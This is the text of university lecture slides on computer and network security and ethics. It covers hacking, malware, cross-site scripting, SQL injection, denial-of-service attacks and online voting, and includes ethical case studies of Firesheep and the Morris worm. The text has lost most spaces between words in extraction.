CS 4001: Computing, Society & ProfessionalismMunmun DeChoudhury |AssistantProfessor|SchoolofInteractiveComputing
Week 12: Computer and Network SecurityMarch 30, 2017
Chapter Overview
• Introduction
• Hacking
• Malware
• Onlinevoting
• Cybercrimeandcyberattacks
7.1 Introduction
• Computersgettingfasterandlessexpensive
• Utilityofnetworkedcomputersincreasing§ Shoppingandbanking§ Managingpersonalinformation§ Controllingindustrialprocesses
• Increasinguseofcomputers® growingimportanceofcomputersecurity
7.2 Hacking
Hackers, Past and Present
• Originalmeaningofhacker:explorer,risktaker,systeminnovator§ MIT’sTechModelRailroadClubin1950s
• 1960s-1980s:Focusshiftedfromelectronicstocomputersandnetworks§ 1983movieWarGames
• Modernmeaningofhacker:someonewhogainsunauthorizedaccesstocomputersandcomputernetworks
Obtaining Login Names and Passwords
• Bruteforcemethodsanddictionaryattacks
• Eavesdropping
• Dumpsterdiving
• Socialengineering
Sidejacking
• Sidejacking:hijackingofanopenWebsessionbycapturingauser’scookie
• Sidejacking possibleonunencryptedwirelessnetworksbecausemanysitessendcookies“intheclear”
• Internetsecuritycommunitycomplainedaboutsidejacking vulnerabilityforyears,butecommercesitesdidnotchangepractices
Computer Fraud and Abuse Act
• Criminalizeswidevarietyofhacker-relatedactivities§ Transmittingcodethatdamagesacomputer§ AccessinganyInternet-connectedcomputerwithout
authorization§ Transmittingclassified governmentinformation§ Traffickingincomputerpasswords§ Computerfraud§ Computerextortion
• Maximumpenalty:20yearsinprisonand$250,000fine
Other Laws
• Otherlaws– ElectronicCommissionPrivacyAct(cannotinterceptelectroniccommunicationsorreademailwithoutauthorization)
• WireFraudAct,NationalStolenPropertyAct,IdentityTheftandAssumptionDeterrenceAct
ClassActivity1:CaseStudyofFiresheep
Firesheep: Act Utilitarian Analysis
• ReleaseofFiresheepledmediatofocusonsecurityproblem
• Benefitswerehigh:afewmonthslaterFacebookandTwittermadetheirsitesmoresecure
• Harmswereminimal:noevidencethatreleaseofFiresheepcausedbigincreaseinidentitytheftormaliciouspranks
• Conclusion:ReleaseofFiresheepwasgood
Firesheep: Kantian Analysis
• Accessingsomeoneelse’suseraccountisaninvasionoftheirprivacyandiswrong
• Butlerprovidedatoolthatmadeitmuchsimplerforpeopletodosomethingthatiswrong,sohehassomemoralaccountabilityfortheirmisdeeds
• Butlerwaswillingtotolerateshort-termincreaseinprivacyviolationsinhopethatmediapressurewouldforceWebretailerstoaddsecurity
• HetreatedvictimsofFiresheep asameanstohisend
• ItwaswrongforButlertoreleaseFiresheep
Firesheep: Virtue Ethics Analysis
• Butlersharedexpertiseandknowledgetohelppeopleandeducatethemoftheprivacyrisksofusingsomenon-encryptedwebsites
• ButlerexhibitedcouragebytakingpersonalresponsibilityforcreatingFiresheep,andhedemonstratedbenevolencebymakingitfreelyavailable
• Butler’sinterestinpromotingthecommongood
7.3 Malware
Viruses
• Virus:Pieceofself-replicatingcodeembeddedwithinanotherprogram(host)
• Virusesassociatedwithprogramfiles§ Harddisks,floppydisks,CD-ROMS§ Emailattachments
• Howvirusesspread§ DiskettesorCDs§ Email§ FilesdownloadedfromInternet
How a Virus Replicates
Email Attachment with Possible Virus
How an Email Virus Spreads
Antivirus Software Packages
• Allowcomputeruserstodetectanddestroyviruses
• Mustbekeptup-to-datetobemosteffective
• Manypeopledonotkeeptheirantivirussoftwarepackagesup-to-date
• Consumersneedtobewareoffakeantivirusapplications
Worm
• Self-containedprogram
• Spreadsthroughacomputernetwork
• Exploitssecurityholesinnetworkedcomputers
How a Worm Spreads
Cross-site Scripting
• Anotherwaymalwaremaybedownloadedwithoutuser’sknowledge
• ProblemappearsonWebsitesthatallowpeopletoreadwhatothershaveposted
• Attackerinjectsclient-sidescriptintoaWebsite
• Victim’s(thenextuser’s)browserexecutesscript,whichmaystealcookies,trackuser’sactivity,orperformanothermaliciousaction
Drive-by Downloads
• UnintentionaldownloadingofmalwarecausedbyvisitingacompromisedWebsite
• AlsohappenswhenWebsurferseespop-upwindowaskingpermissiontodownloadsoftwareandclicks“Okay”
• GoogleAnti-MalwareTeamsays1.3percentofqueriestoGoogle’ssearchenginereturnamaliciousURLsomewhereonresultspage
Trojan Horses and Backdoor Trojans
• Trojanhorse:Programwithbenigncapabilitythatmasksasinisterpurpose
• BackdoorTrojan:Trojanhorsethatgivesattackeraccesstovictim’scomputer§ Mayclaimtocleansemalwarefromauser’s
computer,butinrealityitinstallsspyware
Rootkits
• Rootkit:Asetofprogramsthatprovidesprivilegedaccesstoacomputer
• Activatedeverytimecomputerisbooted
• Usessecurityprivilegestomaskitspresence
Spyware and Adware
• Spyware:ProgramthatcommunicatesoveranInternetconnectionwithoutuser’sknowledgeorconsent§ MonitorWebsurfing§ Logkeystrokes§ Takesnapshotsofcomputerscreen§ Sendreportsbacktohostcomputer
• Adware:Typeofspywarethatdisplayspop-upadvertisementsrelatedtouser’sactivity
• BackdoorTrojansoftenusedtodeliverspywareandadware
Bots
• Bot:AkindofbackdoorTrojanthatrespondstocommandssentbyacommand-and-controlprogramonanothercomputer
• Firstbotssupportedlegitimateactivities§ InternetRelayChat§ MultiplayerInternetgames
• Otherbotssupportillegalactivities§ Distributingspam§ CollectingpersoninformationforIDtheft§ Denial-of-serviceattacks
Botnets and Bot Herders
• Botnet:Collectionofbot-infectedcomputerscontrolledbythesamecommand-and-controlprogram
• Somebotnetshaveoveramillioncomputersinthem
• Botherder:Someonewhocontrolsabotnet
ClassActivity2:TheInternetWorm(RobertTappanMorrisCaseStudy)
Ethical Evaluation
• Kantianevaluation§ Morrisusedothersbygainingaccesstotheircomputers
withoutpermission
• Socialcontracttheoryevaluation§ Morrisviolatedpropertyrightsoforganizations
• Utilitarianevaluation§ Benefits:Organizationslearnedofsecurityflaws§ Harms:Timespentbythosefightingworm,unavailable
computers,disruptednetworktraffic,Morris’spunishments
• MorriswaswrongtohavereleasedtheInternetworm
Defensive Measures
• Securitypatches:Codeupdatestoremovesecurityvulnerabilities
• Anti-malwaretools:Softwaretoscanharddrives,detectfilesthatcontainvirusesorspyware,anddeletethesefiles
• Firewall:Asoftwareapplicationinstalledonasinglecomputerthatcanselectivelyblocknetworktraffictoandfromthatcomputer
7.5 Online Voting
Motivation for Online Voting
• 2000U.S.Presidentialelectioncloselycontested
• Floridapivotalstate
• MostFloridacountiesusedkeypunchvotingmachines
• Twovotingirregularitiestracedtothesemachines§ Hangingchad§ “Butterflyballot”inPalmBeachCounty
The Infamous “Butterfly Ballot”
AP Photo/Gary I. Rothstein
GroupActivity:EthicalEvaluationofOnlineVoting:1) ActUtilitarianPerspective;2) 2)KantianPerspective
Supposeonlinevotingreplacedtraditionalvoting
Utilitarian Analysis
• Benefit:Timesavings§ Assume50%ofadultsactuallyvote§ Supposevotersaves1hourbyvotingonline§ AveragepayinU.S.is$18.00/hour§ Timesavingsworth$9peradultAmerican
• HarmofDDoSattackdifficulttodetermine§ WhatisprobabilityofaDDoSattack?§ Whatistheprobabilityanattackwouldsucceed?§ Whatistheprobabilityasuccessfulattackwould
changetheoutcomeoftheelection?
Kantian Analysis
• Thewillofeachvotershouldbereflectedinthatvoter’sballot
• Theintegrityofeachballotisparamount
• Abilitytodoarecountnecessarytoguaranteeintegrityofeachballot
• Thereshouldbeapaperrecordofeveryvote
• Eliminatingpaperrecordstosavetimeand/ormoneyiswrong
Conclusions
• Existingsystemsarehighlylocalized
• Widespreadtaintingmorepossiblewithonlinesystem
• Nopaperrecordswithonlinesystem
• Evidenceoftamperingwithonlineelections
• Relyingonsecurityofhomecomputersmeanssystemvulnerabletofraud
• Strongcasefornotallowingonlinevoting
Benefits of Online Voting
• Morepeoplewouldvote
• Voteswouldbecountedmorequickly
• Noambiguitywithelectronicvotes
• Costlessmoney
• Eliminateballotboxtampering
• Softwarecanpreventaccidentalover-voting
• Softwarecanpreventunder-voting
Risks of Online Voting
• Givesunfairadvantagetothosewithhomecomputers
• Moredifficulttopreservevoterprivacy
• Moreopportunitiesforvoteselling
• ObvioustargetforaDDoSattack
• Securityofelectiondependsonsecurityofhomecomputers
• Susceptibletovote-changingvirusorRAT
• Susceptibletophonyvoteservers
• Nopapercopiesofballotsforauditingorrecounts
7.4 Cyber Crime and Cyber Attacks
Phishing and Spear-phishing
• Phishing:Large-scaleefforttogainsensitiveinformationfromgulliblecomputerusers§ Phishingemailsaresenttousersaskingthemto
entersensitiveinformationonanimposterwebsite§ Atleast67,000phishingattacksgloballyinsecondhalfof
2010§ Newdevelopment:phishingattacksonChinesee-commerce
sites
• Spear-phishing:Variantofphishinginwhichemailaddresseschosenselectivelytotargetparticulargroupofrecipients
SQL Injection
• Methodofattackingadatabase-drivenWebapplicationwithimpropersecurity
• Attackinserts(injects)SQLqueryintotextstringfromclienttoapplication
• Applicationreturnssensitiveinformation
Denial-of-service and DDOS Attacks
• Denial-of-serviceattack:Intentionalactiondesignedtopreventlegitimateusersfrommakinguseofacomputerservice
• AimofaDoS attackisnottostealinformationbuttodisruptaserver’sabilitytorespondtoitsclients
• Distributeddenial-of-serviceattack:DoS attacklaunchedfrommanycomputers,suchasabotnet
The Rise and Fall of Blue Security Part I: The Rise
• BlueSecurity:AnIsraelicompanysellingaspamdeterrencesystem
• BlueFrogbotwouldautomaticallyrespondtoeachspammessagewithanopt-outmessage
• Spammersstartedreceivinghundredsofthousandsofopt-outmessages,disruptingtheiroperations
• 6of10ofworld’stopspammersagreedtostopsendingspamtousersofBlueFrog
The Rise and Fall of Blue Security Part II: The Fall
• Onespammer(PharmaMaster)startedsendingBlueFrogusers10-20timesmorespam
• PharmaMasterthenlaunchedDDoSattacksonBlueSecurityanditsbusinesscustomers
• BlueSecuritycouldnotprotectitscustomersfromDDoSattacksandvirus-lacedemails
• BlueSecurityreluctantlyterminateditsanti-spamactivities
Attacks on Twitter and Other Social Networking Sites
• MassiveDDoSattackmadeTwitterserviceunavailableforseveralhoursonAugust6,2009
• Threeothersitesattackedatsametime:Facebook,LiveJournal,andGoogle
• AllsitesusedbyapoliticalbloggerfromtheRepublicofGeorgia
• AttacksoccurredonfirstanniversaryofwarbetweenGeorgiaandRussiaoverSouthOssetia
1-
Anonymous
• Anonymous: loosely organized international movement of hacktivists (hackers with a social or political cause)
• Various DDoS attacks attributed to Anonymous members
1-47
Year Victim Reason
2008 Church of Scientology Attempted suppression of Tom Cruise interview
2009 RIAA, MPAA RIAA, MPAA’s attempt to take down the Pirate Bay
2009 PayPal, VISA, MasterCard
Financial organizations freezing funds flowing to Julian Assange of WikiLeaks
2012 U.S. Dept. of Justice, RIAA, MPAA
U.S. Dept. of Justice action against Megaupload